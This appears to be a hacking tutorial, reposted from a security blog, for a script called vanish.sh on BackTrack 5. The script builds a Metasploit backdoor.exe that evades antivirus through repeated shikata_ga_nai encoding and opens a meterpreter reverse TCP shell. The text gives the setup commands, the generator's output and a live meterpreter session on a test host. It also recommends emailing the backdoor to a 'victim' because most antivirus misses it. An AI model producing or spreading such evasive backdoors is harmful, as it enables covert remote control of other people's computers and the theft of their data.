This is a modified and stable version of the script, made to work with the BackTrack 5 distribution.
To compile the generated payload we need the Mingw32 gcc-runtime package,
which you can install with:
root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
root@bt:/pentest/exploits/framework# chmod +x vanish.sh
root@bt:/pentest/exploits/framework# sh vanish.sh
************************************************************
Fully Undetectable Metasploit Payload generaor Beta
Original Concept and Script by Astr0baby
Stable Version of Script is Edited by Vanish3r
Video Tutorial by Vanish3r - www.securitylabs.in
Powered by TheHackerNews.com and securitylabs.in
************************************************************
Network Device On your Computer :
lo:
eth2:
Which Interface to use ? eth2
What Port Number are we gonna listen to? : 443
Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 7000
How many times you want to encode ? 1-20 : 14
Current Ip is : 192.168.93.1
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 560 (iteration=10)
[*] x86/shikata_ga_nai succeeded with size 587 (iteration=11)
[*] x86/shikata_ga_nai succeeded with size 614 (iteration=12)
[*] x86/shikata_ga_nai succeeded with size 641 (iteration=13)
[*] x86/shikata_ga_nai succeeded with size 668 (iteration=14)
backdoor.exe ...generated in seclabs subfolder
backdoor.exe sha1checksum is .. 94da3a4888d8158c9dafa51e2d35528d99a1e871 backdoor.exe
starting the meterpreter listener...
vanish.sh will create a subfolder called "seclabs" and you will find your backdoor.exe there :)
# Recommended :
Seed number = 7000 and
number of encoding iterations = 14
# Sending to Victim :
You can easily send it by email, as it is undetectable by most anti-virus products, or by any other way.
After execution on the victim, our Metasploit console shows the connection :))
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.200.22
LPORT => 443
[*] Started reverse handler on 192.168.93.1:443
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.93.2
[*] Meterpreter session 1 opened (192.168.93.1:443 -> 192.168.93.2:55865)
meterpreter > ps
Process list
============
PID  Name            Arch  Session  User                      Path
---  ----            ----  -------  ----                      ----
12   services.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\services.exe
17   explorer.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\explorer.exe
33   winedevice.exe  x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\winedevice.exe
8    24382.exe       x86   0        NT AUTHORITY\INTERACTIVE  Z:\pentest\exploits\framework\ShellCode\24382.exe
meterpreter > sysinfo
Computer : bt
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
By default the script generates a reverse TCP payload, but you can change that by modifying the script [vanish.sh].
Source: securitylabs